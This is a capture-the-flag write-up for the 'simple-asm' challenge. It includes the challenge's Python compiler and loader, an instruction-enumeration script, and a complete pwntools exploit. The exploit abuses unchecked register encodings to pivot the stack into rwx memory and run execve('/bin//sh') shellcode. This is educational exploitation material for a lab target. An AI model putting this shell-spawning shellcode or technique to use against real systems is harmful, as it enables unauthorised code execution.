CSR23 simple-asm Shellcode Challenge

Solution to the Cyber Security Rumble Finals challenge simple-asm.

The challenge is strait forward. It defines an custom set of instructions, that get translated to x64 instructions directly and are then executed at a fixed offset, in a no-PIE binary. The translation lacks checks, such that the instructions do more than they should at first sight, when using specific higher register.

This is the provides challenge source code, also running on the remote instance:

import os
import struct
import sys


def main():
    print("Input your code, followed by END", flush=True)

    # Read in code
    source = []
    while True:
        line = input()

        # Break at end
        if line == "END":
            break

        source.append(line)

    # Compile and execute code
    code = compile_asm(source)
    print("Executing code", flush=True)
    execute_shellcode(code)


def compile_asm(source):
    code = b""

    for line in source:
        # Skip empty lines and comments
        if not line:
            continue
        if line.strip().startswith("#"):
            continue

        # Split into mnemonic and operands
        instr, regs = line.split(maxsplit=1)
        regs = [parse_reg(r) for r in regs.split(",")]

        # Generate machine code
        match instr, regs:
            case "nul", [reg]:
                code += bytes([0x48, 0x31, 0xC0 | reg | (reg << 3)])
            case "inc", [reg]:
                code += bytes([0x48, 0xFF, 0xC0 | reg])
            case "add", [reg_dst, reg_src]:
                code += bytes([0x48, 0x01, 0xC0 | reg_dst | (reg_src << 3)])
            case _:
                print(f"Unknown instruction: {line}", flush=True)
                sys.exit()

    return code


def parse_reg(reg):
    # Parse register number
    reg = reg.strip()
    assert reg.startswith("r")
    return int(reg[1:])


def execute_shellcode(code):
    # Align code to multiple of page size
    if len(code) % 0x1000:
        code += b"\xcc" * (0x1000 - (len(code) % 0x1000))

    # Build ELF file in memory
    elf = b""

    # ELF header
    elf += b"\x7fELF\x02\x01\x01\x03\0\0\0\0\0\0\0\0\x02\0\x3e\0\x01\0\0\0\0\0\0\x01\0\0\0\0\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\0\x38\0\x01\0\0\0\0\0\0\0"

    # Program header
    elf += b"\x01\0\0\0\x07\0\0\0\0\x10\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\x01\0\0\0\0"
    elf += struct.pack("<Q", len(code)) * 2
    elf += b"\0\x10\0\0\0\0\0\0"

    # Pad to whole page
    elf = elf.ljust(0x1000, b"\0")

    # Shellcode
    elf += code

    # Put ELF into memfd
    memfd = os.memfd_create("sc")
    f = os.fdopen(memfd, mode="wb")
    f.write(elf)
    f.flush()

    # Execute memfd
    os.execve(memfd, ["sc"], {})
    print("execve failed!", flush=True)


if __name__ == "__main__":
    main()

To know what we are working with, this script enumerates all pairs of “simple-asm” instruction to x64 instruction:

import pwn
from itertools import permutations
from typing import Iterable, Callable, Tuple

pwn.context.update(arch='amd64')


def nul(reg: int) -> bytes:
    return bytes([0x48, 0x31, 0xC0 | reg | (reg << 3)])


def inc(reg: int) -> bytes:
    return bytes([0x48, 0xFF, 0xC0 | reg])


def add(reg_src: int, reg_dst: int) -> bytes:
    return bytes([0x48, 0x01, 0xC0 | reg_dst | (reg_src << 3)])


byte = range(0x100)


def try_all(func: Callable) -> Iterable[Tuple[list, bytes]]:
    num_params = func.__code__.co_argcount
    for i in permutations(byte, num_params):
        try:
            disasm = pwn.disasm(func(*i))
            if '(bad)' not in disasm:
                yield i, disasm
        except ValueError:
            pass


for i in try_all(nul):
    print(i)
for i in try_all(inc):
    print(i)
for i in try_all(add):
    print(i)

From the output of script we can see that we have xor rXX, rYY, inc rXX, dec rXX, rex.W call rXX, rex.W jmp rXX, rex.W jmp rXX, rex.W push rXX and add rXX, rYY. This is a lot to work with, especially since we are running in a no-PIE binary, that has rwx memory.

The plan for exploitation is the following: First, we build a primitive to write an arbitrary value in any register. This is done by setting another register say rbx one by:

nul r11  # xor    rbx, rbx
inc r3   # inc    rbx rbx = 1

and then doubling it 64 times. Each time i checking if the value we want to write has a 1 at bit i. If so we add rbx, that at this point is 1 << i, to the target register.

Second, we set rsp into an executable area. Next, we push the shellcode in pieces of eight bytes backwards on our pivoted stack, by constructing the address in an register with our first primitive. Last, we just need to jump to our shellcode by calling rsp.

We could optimize this at multiple points, e.g. by filling all registers at once, but size or execution time is not a concern of this challenge

Here is the full exploit:

import pwn
from typing import List


pwn.context.update(arch='amd64')


def get_shellcode() -> List[int]:
    # short shellcode
    asm = b"j;X\x99H\xbb/bin//shRST_RWT^\x0f\x05"
    # shellcode as eight byte ints
    shellcode = [int.from_bytes(asm[i:i + 8],
                                byteorder='little',
                                signed=False)
                 for i in range(0, len(asm), 8)]
    return shellcode


def stackpivot() -> str:
    sc = 'nul r4\n'  # xor    rsp, rsp
    sc += 'inc r4\n'  # xor    rsp, rsp
    gadget = 'add r36, r0\n'  # add rsp, rsp
    for i in range(24):
        sc += gadget
    for i in range(500):
        sc += 'inc r4\n'  # inc rsp
    return sc


sc = stackpivot()

for inst in get_shellcode()[::-1]:
    sc += 'nul r11\n'  # xor    rbx, rbx
    sc += 'inc r3\n'   # inc    rbx (rbx = 1)
    sc += 'nul r13\n'  # xor    rbp, rbp
    for i in range(64):
        if inst & (1 << i):
            sc += 'add r29, r0\n'  # add rbp, rbx
        sc += 'add r27, r0\n'  # add rbx, rbx
    sc += 'inc r53\n'  # push rbp

sc += 'inc r228\n'  # call rsp
sc += 'END\n'

p = pwn.process(['python3', 'simple_asm.py'])
p.send(sc)
p.interactive()